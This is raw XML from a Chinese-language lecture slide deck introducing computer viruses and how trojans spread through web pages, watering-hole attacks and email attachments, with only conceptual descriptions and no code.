          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）网页浏览植入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55302" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614144" y="1243451"/>
            <a:ext cx="8056890" cy="4779962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>网页浏览传播：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Script/ActiveX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>控件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>JavaApplet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等编写出一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网页，当我们浏览该页面时，会在后台将木马程序下载到计算机缓存中，然后修改系统注册表，使相关键值指向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>程序。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>还可以利用浏览器的已知或者未知的漏洞，把木马下载到本机并运行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2023715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E86D20D-A32A-4211-9A41-504ED2475AED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675481" y="1536491"/>
            <a:ext cx="7793037" cy="4624465"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>美国科恩博士</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>最早</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>定义）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>计算机病毒是一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>计算机程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>，它通过修改其他程序把自己的一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>拷贝或演化的拷贝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>插入到其他程序中实施感染</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>传染特性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，即病毒可以自我繁殖</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>演化特性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，即病毒在感染过程中可以改变自身的一些特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，以逃避查杀</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B438E614-54EE-4B28-91FB-3C40D1B9AD99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35939437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11517" y="1475335"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>水坑攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Watering hole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）： 在受害者必经之路设置一个“水坑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>陷阱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。最常见的做法是，黑客分析攻击目标的上网活动规律，寻找攻击目标经常访问的网站的弱点，先将此网站“攻破”并植入攻击代码，一旦攻击目标访问该网站就会“中招”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）水坑攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36464339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813" y="1254618"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2020.2.19</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：黑客利用后门对香港</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>iOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户发起水坑攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）水坑攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1108185" y="2446940"/>
            <a:ext cx="6772275" cy="4210050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29892812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74578" y="1443804"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>威瑞森的报告显示，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>94%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的恶意软件通过电子邮件传播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，排名第一的社会工程攻击是网络钓鱼</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）利用电子邮件植入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1322989" y="4269689"/>
            <a:ext cx="5867400" cy="809625"/>
            <a:chOff x="928851" y="4348517"/>
            <a:chExt cx="5867400" cy="809625"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="图片 5"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="928851" y="4348517"/>
              <a:ext cx="5867400" cy="809625"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4751987" y="4458054"/>
              <a:ext cx="1981200" cy="590550"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22742526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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）利用电子邮件植入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56326" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496888" y="1316038"/>
            <a:ext cx="7772400" cy="4856162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>电子邮件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>E-mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>）进行传播：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击者将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>程序伪装成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>E-mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>附件的形式发送出去，收信人只要查看邮件附件就会使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>程序得到运行并安装进入系统。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>通过在邮件内容内嵌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSH(Windows Scripts Host)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>脚本，用户不需要打开附件，仅仅浏览一下邮件的内容，附件中的木马就会被执行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>附件文档中不包含恶意代码，而是下载恶意代码的链接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pP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56326">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5632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5632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5632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56326">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5632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5632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5632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56326">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5632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5632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56326">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="56326">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56326">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56326">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5632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6"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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例一</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0818799-A669-4790-8C94-2937FC977E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938" y="1554163"/>
            <a:ext cx="6499225" cy="3772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813" y="1401763"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
